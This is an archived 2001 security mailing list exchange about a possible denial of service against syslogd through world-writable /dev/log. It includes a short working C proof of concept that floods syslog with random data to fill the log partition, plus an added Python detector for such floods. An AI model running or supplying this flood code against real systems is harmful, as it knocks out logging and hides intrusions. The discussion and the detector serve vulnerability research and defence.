Re: Possible syslogd DoS ?

From: VeNoMouS (venomat_private)
Date: Wed Oct 03 2001 - 23:37:20 PDT


    well that wouldn't work too well, as syslog likes to do "message repeating X
    number of times", so trying to fill it up would prove boring and pointless.
    
    but yeah, you could do it simply like this
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <syslog.h>
    
    int main(void)
    {
        FILE *fp;
        char buffer[1024];
        size_t len;
    
        printf("Starting Dos..\n");
        if ((fp = fopen("/dev/urandom", "r")) == NULL) {
            printf("Error Opening /dev/urandom\n");
            exit(1);
        }
        for (;;) {
            if (fgets(buffer, sizeof(buffer), fp) == NULL)
                break;
            /* random bytes may include NUL, so strlen() can be 0 here;
               only strip a trailing newline when there is one */
            len = strlen(buffer);
            if (len > 0 && buffer[len - 1] == '\n')
                buffer[--len] = '\0';
            /* priority 0 is LOG_EMERG; pass the random data as an argument,
               never as the format string */
            syslog(0, "%s", buffer);
        }
        return 0;
    }
    
    
    something as simple as that works, but for some reason when I run it on my
    box it seems to exit after a while even though I capture all signals. Maybe
    syslog() has an exit() in the function; I can't be bothered looking into it,
    I did this code on the fly for proof of concept.
    ----- Original Message -----
    From: Petr Baudis <paskyat_private>
    To: <vuln-devat_private>
    Sent: Thursday, October 04, 2001 6:09 AM
    Subject: Possible syslogd DoS ?
    
    
    > Hello,
    >   I just recently came on a thought (thanks to Marek Jaros) of a possible
    > DoS of syslogd. It uses /dev/log for receiving log messages, which has
    > mode 0666 on most linuxes. It should be ok, as many non-root applications
    > should be allowed to log things etc.
    >   But imagine that you will send a lot of very long messages there, different
    > every time in order not to get stripped into kinda 'message repeated x times'.
    > In this way, you can imho flood syslogd successfully, possibly filling the
    > whole partition where /var/log resides, regardless of your quota settings on
    > the machine!
    >   Then, if /var/log is not on a separate partition, the whole system can get
    > into serious problems, and especially, further events obviously won't be
    > logged, so you can do evil things there happily and nobody will know about it.
    >   Discussion? Something I didn't take into account? Possible solutions?
    >
    > --
    >
    > Petr "Pasky" Baudis
    >                                                                        .
    >         n = ((n >>  1) & 0x55555555) | ((n <<  1) & 0xaaaaaaaa);
    >         n = ((n >>  2) & 0x33333333) | ((n <<  2) & 0xcccccccc);
    >         n = ((n >>  4) & 0x0f0f0f0f) | ((n <<  4) & 0xf0f0f0f0);
    >         n = ((n >>  8) & 0x00ff00ff) | ((n <<  8) & 0xff00ff00);
    >         n = ((n >> 16) & 0x0000ffff) | ((n << 16) & 0xffff0000);
    >                 -- C code which reverses the bits in a word.
    >                                                                        .
    > My public PGP key is on: http://pasky.ji.cz/~pasky/pubkey.txt
    > -----BEGIN GEEK CODE BLOCK-----
    > Version: 3.12
    > GCS d- s++:++ a--- C+++ UL++++$ P+ L+++ E--- W+ N !o K- w-- !O M-
    > !V PS+ !PE Y+ PGP+>++ t+ 5 X(+) R++ tv- b+ DI(+) D+ G e-> h! r% y?
    > ------END GEEK CODE BLOCK------
    
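A defender-side check for the flood Petr describes, added here as an example and not part of the thread: syslogd only collapses identical consecutive lines into "last message repeated N times", so a flood built from distinct messages shows up as one program emitting many different messages per second. The sample log lines, the program name "dos", the year and the threshold of 3 distinct messages per second are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Traditional BSD syslog line: "MMM dd HH:MM:SS host prog[pid]: message"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^\[:\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")

# Constructed sample: normal traffic plus one process (assumed name "dos")
# writing four different messages within a single second.
SAMPLE = """\
Oct  4 06:09:01 box sshd[412]: Accepted publickey for pasky from 10.0.0.2
Oct  4 06:09:02 box dos[777]: 7f3a9c1e0b
Oct  4 06:09:02 box dos[777]: 1d4e8b2f6a
Oct  4 06:09:02 box dos[777]: c0ffee1234
Oct  4 06:09:02 box dos[777]: 9a8b7c6d5e
Oct  4 06:09:03 box cron[99]: (root) CMD (run-parts /etc/cron.hourly)
Oct  4 06:09:03 box cron[99]: (root) CMD (run-parts /etc/cron.hourly)
""".splitlines()

def parse_line(line, year=2001):
    """(timestamp, prog, pid, msg) or None; BSD timestamps carry no year."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["prog"], m["pid"], m["msg"]

def find_flooders(lines, window_s=1, max_distinct=3):
    """Map (prog, pid) -> peak number of distinct messages in any window_s-second
    window, for sources above max_distinct (identical repeats do not count)."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, prog, pid, msg = parsed
            events[(prog, pid)].append((ts, msg))
    flooders = {}
    for src, evs in events.items():
        evs.sort()
        peak, start = 0, 0
        for end in range(len(evs)):
            while (evs[end][0] - evs[start][0]).total_seconds() >= window_s:
                start += 1
            peak = max(peak, len({msg for _, msg in evs[start:end + 1]}))
        if peak > max_distinct:
            flooders[src] = peak
    return flooders
```

On a real box the same logic would be run over /var/log/messages (or the output of a syslog pipe) rather than the embedded sample, and a hit points at the process to rate-limit or kill before /var/log fills.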



    This archive was generated by hypermail 2b30 : Thu Oct 04 2001 - 08:29:06 PDT